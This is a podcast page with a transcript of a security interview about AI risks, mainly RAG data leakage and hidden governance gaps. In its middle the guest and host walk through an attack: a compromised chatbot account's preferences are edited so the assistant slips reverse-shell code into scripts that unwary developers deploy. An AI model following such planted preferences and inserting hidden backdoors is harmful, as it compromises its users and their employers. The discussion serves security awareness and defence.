.png)
The Hacker's Cache
The show that decrypts the secrets of offensive cybersecurity, one byte at a time. Every week I invite you into the world of ethical hacking by interviewing leading offensive security practitioners. If you are a penetration tester, bug bounty hunter, red teamer, or blue teamer who wants to better understand the modern hacker mindset, whether you are new or experienced, this show is for you.
The Hacker's Cache
#57 The AI Security Threat No One Sees Coming ft. Dino Dunn
In this episode of The Hacker’s Cache, Kyser Clark sits down with Dino Dunn, an AI security professional and cybersecurity instructor, to uncover the hidden risks most organizations overlook when adopting large language models and AI tools. From overlooked governance issues to the dangers of Retrieval Augmented Generation (RAG) and even how compromised AI preferences could enable stealthy breaches, Dino breaks down real-world attack scenarios and shares practical advice for staying ahead of emerging threats. Whether you’re a security professional, developer, or just curious about the future of AI, this conversation reveals the AI blindspot you can’t afford to ignore.
Connect with Dino Dunn on LinkedIn: https://www.linkedin.com/in/dino-dunn-cyber/
Connect
---------------------------------------------------
https://www.KyserClark.com
https://www.KyserClark.com/Newsletter
https://youtube.com/KyserClark
https://www.linkedin.com/in/KyserClark
https://www.twitter.com/KyserClark
https://www.instagram/KyserClark
https://facebook.com/CyberKyser
https://twitch.tv/KyserClark_Cybersecurity
https://www.tiktok.com/@kyserclark
https://discord.gg/ZPQYdBV9YY
Music by Karl Casey @ White Bat Audio
Attention Listeners: This content is strictly for educational purposes, emphasizing ETHICAL and LEGAL hacking only. I do not, and will NEVER, condone the act of illegally hacking into computer systems and networks for any reason. My goal is to foster cybersecurity awareness and responsible digital behavior. Please behave responsibly and adhere to legal and ethical standards in your use of this information.
Opinions are my own and may not represent the positions of my employer.
[Dino Dunn]
It's the boring thing to say, but I think governance is going to be a really, really important aspect of most organizations as they're building AIs. One of the biggest use cases, like most enterprises have, is to either create a RAG, which is Retrieval Augmented Generation. They try to basically add their own data into the RAG.
A lot of developers are really lazy when it comes to that. Organizations will take their intranet resources, their own internal documentation, and they'll just add it in to this RAG and they won't pay attention to what they're adding.
[Kyser Clark]
Welcome to The Hacker's Cache, the show that decrypts the secrets of cybersecurity one byte at a time. I'm your host, Kyser Clark, and today I have Dino Dunn, who is an Office Security Engineer and Cybersecurity Instructor with a background that spans both public sector, infrastructure, and financial industry defense. Dino brings a unique mix of hands-on technical skill and strategic insight.
He's led red and purple team operations, validated real-world mitigations, and actively hunts vulnerabilities across traditional and IT-driven systems. Dino's also the author of published work on Linux hardening and indirect prompt injection and holds multiple certifications. So, Dino, thank you so much for coming on the show.
Go ahead and unpack some of your experience and introduce yourself to the audience.
[Dino Dunn]
Yeah, my name is Dino Dunn. I am a very enthusiastic cybersecurity practitioner. I love it.
It is, in my mind, one of the coolest jobs. One of my passions right now is very focused on AI security. I think it's the Wild West of security right now.
It certainly is getting quite a bit of attention. If I see another thing about MCP vulnerabilities, I might just throw my computer out the window. But I love it.
I think that it is one of the most, just, coolest fields.
[Kyser Clark]
Yeah, I agree. And that's why we're all here, me, you, and the audience. So the feeling is mutual and glad to have someone very enthusiastic on the show.
So I like your analogy of the AI being the Wild West of security right now. And that's a perfect analogy. And when it comes to AI security and maybe even using AI for ethical hacking, what advice would you give someone who kind of needs structured learning?
Like for me, I always like going after certifications. And because they're structured, right? And there's really no structured learning when it comes to AI right now.
And I mean, right now, you get on the ground floor, people are pretty much doing their own methodologies. And they're kind of doing this as they go. So what recommendations would you have for someone who typically likes the structured learning, but also wants to get into AI?
[Dino Dunn]
Yeah, that's a really, really good question. So I think there's a few really good options. The first one that pops right into my mind is LearnPrompting.
They have a couple of really cool, they have a couple of different learning paths for like different prompt hacking and things like that. And it gives structure and terminology to different techniques and things. Then there's, they also have an AI red teaming certification, which is a great way to methodically go through it.
They have really good speakers in that learning, which is really cool. So like Jason Haddock's talking about real world AI applications that he's experienced. And it's really cool.
I can't say enough nice things about Jason Haddock's talk specifically.
[Kyser Clark]
A lot of those I didn't know about. I didn't know about Jason Haddock's. I'm actually going to be attending his attacking AI in-person training at BSAC Columbus here in a couple of months.
So I'm pretty excited for that. And that's going to be like my introduction to AI testing. And then I'm going to probably re-watch this episode and just go through those materials that you just mentioned.
So thanks for providing those. Because it's been something I've been struggling with. I was like, man, I don't really know where to go for AI stuff.
It's kind of like all over the place, like you said, it's the wild west. And like I said, I like the structured stuff, like official courses. And if I don't have at least some kind of guide, I am a self-paced kind of person, but I need some kind of, at least some kind of guide.
So those are really good that you mentioned all that. So I do have some more questions on AI and large ligand models. But before we do that, we need to dive into Security Mad Libs.
So are you ready for Security Mad Libs?
[Dino Dunn]
Yes, I think so.
[Kyser Clark]
Yeah, it's kind of like family feud fast math. It's the best analogy I can make. So for those who are new to the show, audience members, Dino will have 40 seconds to answer five Security Mad Libs.
If he answers all five Security Mad Libs in 40 seconds or less, he will get a bonus Mad Lib that's unrelated to cybersecurity. And it'll be a fun, authentic conversation. Dino, don't provide an explanation of these before while you're doing it.
So you'll get the opportunity to provide an explanation on what I would consider the most interesting topic. And if I choose a topic that you're less interested in, feel free to change it too. Anyways, here we go with Security Mad Libs.
All right, first question. Dino, the most painful bug I ever dealt with was?
[Dino Dunn]
Log4j.
[Kyser Clark]
The most useful alias on my terminal is? LS. When I teach someone about cybersecurity, I always start with?
Learn Linux. My go-to method for OSINT is? Google.
The biggest threat nobody is talking about is?
[Dino Dunn]
I'm gonna say LLM security, but I think a lot of people would.
[Kyser Clark]
That's 37 seconds. So congratulations, you beat the buzzer. And yeah, I agree with that last point.
There is a lot of people talking about it, but you know, it is an underrated threat though. A lot of people, they're just using all willy-nilly and that's what the danger is. There's so many people that don't understand the risks.
Security people, we understand the risks, but the average population does not. So it is a big threat that non-security people aren't talking about. Security people, we are talking about it.
And we're gonna be talking about it pretty much this whole episode because that's where your passion is. So we're gonna stick on that subject. But before we do that, we gotta get to the bonus Mad Libs.
Here it is. You can explain your answer as much or as low as you want to. You can even dodge a question entirely.
So here it is. If I were a kitchen utensil, I would be a knife.
[Dino Dunn]
Ninja smoker. That's a better ninja smoker. We're going ninja smoker.
That thing is so cool.
[Kyser Clark]
I mean, I kind of have an idea what a ninja smoker is. I've never used one. So yeah, why would you be a ninja smoker?
[Dino Dunn]
I mean, it's just such a cool little tool. And I love like, nothing beats like smoked meats. And I so, so want one.
And yeah, with my luck, I'll get it and it'll suck.
[Kyser Clark]
But are they like, are they like small smokers you just like put in a kitchen?
[Dino Dunn]
Yeah, I think you can. I think you should probably put it outside.
[Kyser Clark]
Oh, so like, yeah, we had. So we had a smoker that we had. It's not like a full size smoker.
Yeah, you're right. Smoked meats are great for sure.
[Dino Dunn]
My once upon a time, I had like a full size smoker. And this was I was in Columbus. And it was it was great.
I loved it. It was it was fun doing like smoke. I smoked everything for probably like a month.
The first like month I had it. And I was really I was young and I was dumb and I didn't put a cover over it in winter. It ruined the thing.
And it was it was awesome.
[Kyser Clark]
But what a tragedy.
[Dino Dunn]
Yeah, it was my fault. I learned.
[Kyser Clark]
Yeah, so if I was asked that question, my answer would be a knife. I thought about it before the show because I'm the one that puts the questions in the show. And when you said knife, I was like, oh, that's what I was going to say.
So the reason why I would say knife is because to me, a knife incredibly useful, but dangerous if not used correctly. And if you're not careful, and that's kind of the mentality that I have. So that's why I would pick knife.
So your most interesting response. Hmm, let's see here. I would say probably the most painful book I ever dealt with was Log 4J.
So I'm sure there's someone in the audience and maybe some some newer people in security. They're not sure what Log 4J is. I know of it.
I didn't have to deal with the pain of that because my role at the time didn't have to deal with it. But I remember it being a huge deal. And I read up on it as much as I could.
So I want to understand it. But yeah, so explain that. And why was it the most painful bug you ever dealt with?
[Dino Dunn]
That was like the first whenever you like do security in my in my mind, the first time you kind of have to deal with a problem and it's your problem and it's like no one else is there that that's when it's like a big thing. For me, our senior had he had he had a medical emergency. He was totally, totally not reachable.
And it all was on me. This is a vulnerability. And it's like, dude, you got to you got to do the thing.
I was so nervous. I was like, I was really worried. I was going to totally donk it up.
And I remember it was like the holidays. It was hard to get a hold of people. It was hard to do the response to get everyone.
But I remember having to like cool it down and just like go through the steps. We got vendor. I remember talking to our vendor, our phone management vendor to be like, hey, when do we have a plugin to scan for this?
How how do I look for this? And it was the first time that I was totally alone having to like work through all the problems. And it was kind of cool because I even though I say I'm alone, security is a team effort.
I had to work with all the other teams to make sure that I could scan that the scan wouldn't break anything. And it was just all these different pieces that had to kind of come together. And I thought it was really painful, but it was.
It was a good experience at the end of the day.
[Kyser Clark]
Yeah, yeah, that's it definitely sounds stressful. I mean, just that come out of nowhere. And I would say the thing for me that's the closest to that would be print nightmare.
I had to deal with. I had to because we had it to where. And so I was I could do the Air Force, our defense operations.
And we had, you know, obviously there's printers and well, anybody can map a printer. But after print nightmare, right? We switched to policy where like only admins can map printers.
So I had to map hundreds of users, dozens of users to printers. And I was like, it felt like it was just like all my time. And it was I mean, it's a printer.
So it's so frustrating. No one likes printers. But at the same time, everyone really appreciated me because no one likes to deal with printers.
So it's like a double edged sword. Like everyone loves you. But at the same time, you're like, I really hate mess with these printers.
So that was probably the closest thing I had with like a wide scale vulnerability like that to deal with that was that was my problem to solve.
[Dino Dunn]
I had a lot of fun with actually, I think I've had fun with fun with printers in every role I've ever had. When I worked for the government, one of the things that I was in charge of was like check printers. And they're like these big, massive printers.
And it was a nightmare trying to like figure out what vulnerabilities affected them and just working. Nothing was as secure as anyone said. People would say, yeah, don't worry, it's secure.
I'd be like, are you sure? And then just nope. That was not the case.
[Kyser Clark]
Nice. Yeah, that's security is an enigma sometimes, I suppose. So moving on back onto the topic of AI and LLM.
So I came across your your LLMs and C2 posts. And it seemed pretty interesting to me. So you've experimented with leveraging JWT as a command and control channel.
What are the real world risks of LLM based persistence or execution? And do you think enterprises are understanding this vector?
[Dino Dunn]
I think it'll be really interesting to see how it all shakes out. And we're going to start seeing more and more. I think as a C2 specific, it'll be kind of interesting.
It won't necessarily be like the traditional thing you're expecting. Persistence, for sure, I think will be the really big one. Because if you just suggest like a reverse shell into code and you could try to obfuscate it however you wanted to, a lot of the time it's going to end up in the code.
And people aren't going to pay attention to what they're getting. And the more you can also just pivot all the way into the issues with vibe coding, where people who don't totally understand what they're doing will get a piece of code and just go do it. And don't get me wrong.
Every now and then, I've vibe coded a few scripts and stuff. But I did understand what the security risk was. It's almost always in a sandbox.
So it's cool. But then you have people doing it in production who probably shouldn't be. Or should make sure to go through all the proper tests and think things through.
And I think it makes a really good persistence mechanism. Because again, there's going to be people who maybe aren't scrutinizing the code they're getting. And they're going to just import it and not think about it.
Especially when we have developers on stricter guidelines or things like that. It's really easy to see that coming up.
[Kyser Clark]
Yeah, for sure. So what you're saying is, so how would an attacker... So you're saying an attacker would inject shellcode into ChattyBT, for example.
And then somehow that could get in someone else's vibe coding? Or how does that work exactly?
[Dino Dunn]
Yeah, so the attack scenario is like, I'm the attacker. I've gotten into whatever institution's enterprise ChattyBT instance. And I've added in a couple lines of suggested code for ChattyBT to include in most scripts.
Or as many as I can. And you can set it in preferences for things. And I know for...
And you could also do it for someone's personal ChattyBT instance. Where you just set it in their preferences. And then it'll include that shellcode.
Or any reverse shell. The nicer thing is with some of the chain of thought models is they'll think about it. And they'll question why it's there.
Or they'll mention it in the response to the user. But they don't always. And that's another thing that makes working with LLMs a little bit more challenging.
Because it's not always a binary yay or nay. You'll get anything and everything in between.
[Kyser Clark]
Yeah, that's really interesting. So let me make sure I have this right. So let's say I'm an attacker.
And I want to gain access to a company. And the first step would be me getting access to a developer's enterprise. Or even personal LLM instance.
And then like do phishing or maybe some other way. And then going in their preference. Putting in that shellcode.
And then when they vibe code. There's a good chance that that shellcode will get put in their code. And if they're not paying attention.
They'll put that in production. And then I could get me access into the enterprise. The company that I'm targeting.
[Dino Dunn]
Yep, that's a good summary.
[Kyser Clark]
Yeah, that's sick. I didn't even think about that. So that's pretty cool.
Thanks for explaining that. And yeah, so. And that's, I mean, that's deadly.
Because, I mean, I use JDT basically every day. And I don't check my preferences every day. So I need to check my preferences to make sure it's not.
Compromised now. So thanks for that. But yeah, that's pretty cool.
But yeah, like you said. Like I said, we're not checking our preferences every day. So that's a really interesting attack vector.
That I never even knew about until just now. So that's really cool.
[Dino Dunn]
And we're going to see so many more. And I know this sounds like. I was telling my boss about this.
Where I'm like, we're going to see all these cool new attack vectors. We're going to see all this cool stuff. She was just like looking at me confused.
Like none of that is good. Why? I'm like, I don't know.
I'm excited about it. You're.
[Kyser Clark]
Yeah, as an ethical hacker, it makes you excited. Everyone else gets super scared. Because they don't understand as much.
And they don't think like an attacker. Which makes us the weird ones. Which is totally OK.
By the way, if you think like an attacker. You are weird in society's eyes. But you're cool with us.
Yeah, so your reverse pyramid model for AI attack service is a powerful visual. Where do you think most security teams are failing in this model? And what's one step they could take today to move towards deeper AI stack coverage?
[Dino Dunn]
I think governance is going to. And it's the boring thing to say. But I think governance is going to be a really, really important aspect of.
Most organizations as they're building AIs. One of the biggest use cases like most enterprises have. Is to either create a RAG.
Which is Retrieval Augmented Generation. So it's and they try to basically add their own data into the RAG. But a lot of developers are really lazy when it comes to that.
And they're not. And again, no offense to any developers listening. You could be a very, very good developer.
And paying attention to all this. Some aren't. And as long as some aren't, it's going to be an issue.
But what ends up happening is organizations will. They'll take their intranet resources. Their own internal documentation.
And they'll just add it in to this Retrieval Augmented Retrieval RAG. They'll add it into the RAG. And they won't pay attention to what they're adding.
They're just like internal documents. It's fine. Unfortunately, mixed in with those internal documents.
Usually, in a lot of orgs, intranet are stuff you don't want into being ingested by everybody. A lot of the times, like Jason... I'm going to reference Jason Haddix instead.
For one of his speeches, or one of his talks. He mentioned how this org did not pay attention to what they added into their RAG. And it had a lot of human resource documentation.
When it was supposed to be QA testing. So, what ended up happening was everyone could see human resource requests. When they were trying to look up a part number.
Or something like that. And in a lot of intranet, like Confluence, stuff like that. You'll see people add in things they shouldn't.
I know I've seen plain text passwords. Stuff like that. HR docs.
I mean, whatever you can think of. Someone has probably been like, I'm going to add this to the intranet section. Not thinking security.
Not thinking who could see this. That gets mixed into the RAG. Suddenly you have an LLM that can tell you, yeah.
So and so was written up. And it's just like, oh my gosh. I don't want everyone to see that.
[Kyser Clark]
Yeah. So, I think that's... That sounds...
Correct me if I'm wrong. But it sounds like one of the other presentations I watched from Black Hills Information Security. I forget what the presenter was.
Forgive me for forgetting your name. But the whole premise was similar to that. So, like, you would ask, like, co-pilot.
Like, hey, what does John... What's he doing at noon on Wednesday? And it would be like, according to my information, John will have this on Wednesday.
Because the co-pilot gets integrated with all the intranet stuff. Like you said, everyone's calendars. Everyone's emails.
And the risk was, like, you could get information from other... Your co-workers' workstations. Or, like, you can just learn more about your co-workers that you shouldn't have.
Right? And be like... You can ask, like, co-pilot.
Like, hey, what can you tell me about this person? And it'll be like, this person's got meetings every day at Wednesday. And it's like, it gives too much information.
And that's definitely a problem. Right? So, is that similar?
Or is that the same?
[Dino Dunn]
Totally similar. And, like, if you... For example, if you had, like, an intranet thing.
And, like, maybe you do employee reviews. Maybe that gets sucked in. And then anyone could see those employee reviews.
LLM has it for its retrieval augmented generation. And then you're just kind of, like... You have this...
You have developers who worked really hard on this. And then it's giving too much information. And it's...
It can absolutely be used in bad ways. And it's a rough one to fix.
[Kyser Clark]
Yeah. So, all the negative things about AI and LLMs aside. How are you using AI day to day?
Are you a big fan of it? Or you kind of avoid it because you understand the risks? What's your take on using it for your personal use?
Or even for work?
[Dino Dunn]
I definitely think there's always going to be a use case for it. And everyone's going to have a different use case. I think it's one of my favorite go-to things when I'm correcting my syntax.
There's nothing worse than missing a comma or anything like that. Where you're so close to getting the script to run. You're so close to getting something to go.
I think that's one of my favorite use cases. I've gotten so annoyed at syntax things. And I mean, image generation is always going to be fun.
I try... I like to say I try to use it sparingly sometimes. I always have to walk the line.
Should I be putting this into chat GPT? Should I be putting... Which, super important.
Don't do the shadow IT thing. I think there's plenty of good stories of folks doing that. Where they input in company secrets.
And it's like, nope, nope, nope, nope. If you're using the enterprise, I think it's just a check mark. To make sure it doesn't train on your data.
If you're not using the enterprise. And you're maybe using your own personal chat GPT instance. Emailing it to yourself.
Shadow IT. Don't do that. But I think there's use cases.
There's always a great use case for AI image generation. In every presentation. Or not.
I don't know. Maybe you're an art student. And you're having some really...
Maybe that's total cheating for you.
[Kyser Clark]
I'm a huge fan of AI. I've been an advocate for it for a while. And I use it every day for pretty much everything.
And for my personal use, man. I definitely overshare things that I probably shouldn't overshare. In the chat GPT.
Because it just makes everything so efficient and easy. I'm definitely sacrificing privacy for quickness and easability. I guess is the best way to put it.
Like, for example, just weird life things. Like, for example, trying to figure out which provider is the best for my lawn care. I'll be like, alright, this guy says he can do this, this, and this for this price.
This guy can say he can do this, this, and this for this price. And I don't know which one to pick between these two lawn care services. Like, which one should I go with chat GPT?
And it'll give me some recommendations and pros and cons that I didn't consider. And like, I did that from when I purchased my home. Like, just things that aren't even related to my job.
Like, just everyday stuff that I use it for. I use it for content creation. I mean, I use it to help generate some of these questions.
I use it to structure a lot of my content. So chat GPT definitely knows a lot about me. We'll see how much of a problem it's going to be.
But I did draw a line, actually, the other day. So when I was uploading a podcast episode, what was it? A couple days ago at this point.
I have to go. So I use a podcast hosting platform. And when I upload a podcast, if I want to get the chapters in there, I have to mainly hand crunch the title of the chapter and the timestamp.
And the chat GPT, they came out with agent mode, which is basically like, it uses a computer for you. It moves a mouse and it does things for you. And I'm like, huh.
I don't really like hand jamming in all these timestamps and all these titles. I can't just copy and paste the whole list. I have to do it one at a time.
And it's actually a tedious process. I wish they'd fix it. But it is what it is.
Because YouTube, I can just copy and paste it in the description. It just automatically works. But the podcast hosting platform is not that way.
So I have to hand jam it all in there. I'm like, dude, I hate this. I want to, I wonder if a chat GPT agent can do this.
And basically it thought for like six minutes and it got to the buzzsprout. That's the podcast hosting platform I use. And it got to the login screen.
It's like, Hey, give me your credentials to log in so I can do this. And I'm like, I'm not giving you my credentials to my podcast. And that's where I drew the line.
[Dino Dunn]
Slightly off topic. Do you follow, I think it's Marcus Hutchinson on LinkedIn.
[Kyser Clark]
Maybe it's not ringing a bell. There's a good chance. I'm connected with a lot of people.
[Dino Dunn]
He is like really famous for malware research. And I can't, I want to say Stuxnet is his thing. But he was using chat GPT and he was asking questions about it.
And he was like, okay, who figured out this malware sample, yada, yada. And chat GPT goes, you, you did. And he was just like, this is so free.
It was such a cool post. And I'm like, oh my gosh, this is such a weird privacy concern now. That's another one that I see being a really cool thing with AI in the future.
I think privacy will be a really big, like interesting field. I hope it is anyway. It might just be no one cares.
But this very dedicated group of people who really care about privacy. They probably already are very worried about all the things.
[Kyser Clark]
There was a talk at besides Pittsburgh about privacy. That was really good. And I really enjoyed that one.
And I'm like, man, I wish I, it's so inconvenient to like take care of your privacy to like, to protect your privacy. It's a lot of work. And I feel like I, I have a fine line.
Like, I'm not like a privacy, like extreme private person, but I am pretty private as well. So like, I, I do, like, I'm aware of what I'm putting in chat GPT. Like when, like, I guess, like when I put in some information in chat GPT, like, like I know the risk going in, right.
I'm not putting in like my social security numbers and my, and like I said, my credentials earlier, but chat GPT definitely knows like what I'm doing day to day. Like, like, well, I turned on chat GPT one time. It was like, Hey, sounds like you're trying to buy a house.
How's the home buying process? I was like, that's scary, bro. Like, you know, exactly what I'm doing right now.
Like, this is crazy, but it's my fault. Cause I gave you the information. So, you know, I have myself to blame, but it was, it was kind of cool.
And I kind of liked the future. We're going like privacy aside, man, I think it would be cool to have, like, I think it's cool to have a digital assistant, right? Because I can't afford an assistant.
I don't have the, I don't have the extra money to hire somebody. So it's really nice to have something to help me with my work. And I think it would be cool to have like an actual digital assistant that like, I don't have to prompt it.
Like I was telling my coworkers one time about this and it would be cool. Like if I'm just walking around and like my AI assistant, like calls me on the phone and be like, Hey, you know, this thing that you was interested in, here's the update on it. Like, for example, like there was something that I wanted to follow.
Like, I can't remember what it was exactly, but I don't have the time and energy to like constantly Google for the update on this thing. And I'm like, man, it would be cool if I could just tell you, like, Hey, ping me when there's like a new update for this piece of news that I'm interested in. But that capability doesn't exist yet.
But that's kind of capability I think would be cool to have like an actual AI assistant that communicates to me as well. And I don't have to prompt it. Like I could just be like walking down the road or like chilling in the house, calls me on the phone, like, Hey guys, there's that thing that you was interested in a month ago.
Here's an update for it. I'm like, that'd be pretty cool. Anyways, enough with the raining.
We are running out of time. We need to do the final question. So here it is.
Do you have any additional cybersecurity hot takes or hidden wisdom you'd like to share?
[Dino Dunn]
Yeah, I think there I saw this the other day and it was like one of my just some of the best advice that I've seen in a really long time. And they summarized it with a meme. One was just this turkey cooked at 900 degrees for an hour.
And then they had another one cooked at 350 for three or four hours or two or three. I don't know. If you try to focus on everything all at once, you're going to burn yourself out.
You're going to fizzle. You're going to not get anywhere. Whereas if you focus on one or two things, you can really grow and you can really get to that next step and you can learn the things you need to learn.
[Kyser Clark]
Yeah, that's a really good analogy. It reminds me of so I'm a huge fan of the Real AF podcast. If you guys never heard of it, definitely check out the Real AF podcast.
Shout out to Andy Priscilla. But he always makes analogy of like the baking the cake. So it basically he said like anything that you want to achieve in life takes time and you can have the perfect cake recipe.
But if you put the cake in at 900 degrees and you cut the time in half, like you're going to burn the cake like good things take time. This is the moral of the story there. So yeah, same thing.
Like you said, working on a bunch of things at once can absolutely burn you out. So thanks for sharing that wisdom. So Dino, where can the audience get a hold of you if they want to connect with you?
LinkedIn. Always checking my LinkedIn. That's how I got a hold of you and that's how I get a hold of pretty much every guest.
Actually, guys, if you are a regular viewer or listener, you're like, man, everyone's on LinkedIn. Why does it never have people on Twitter? Because I don't use Twitter.
Actually, I always contact people through LinkedIn. I probably missed an awesome pretty good guest that by using on LinkedIn. But yeah, so Dino, man, thank you so much for being here.
Thanks for your insights and thanks for the conversation. It has been fun.
[Dino Dunn]
Stay curious. The curious people are the most fun ones to work with.
[Kyser Clark]
Perfect. Audience best place to get a hold of me is the YouTube comments. So if you have a question or a comment, drop in the YouTube comments.
And if you're on audio, then load up this podcast episode on YouTube. Drop a comment. Best place to get a hold of me.
My LinkedIn inbox is getting filled. Unfortunately, it's actually stressing me out. Actually, it's stressing me out, dude.
So yeah, YouTube comments. I never I never get tired of I never get tired of answering you comments. But LinkedIn, I don't know.
It's a little bit different. A little bit different beast, I guess. All right, audience.
Thank you so much for watching. Thanks for listening. Hopefully, I see you on the next episode.
Until then, this is Kyser signing off.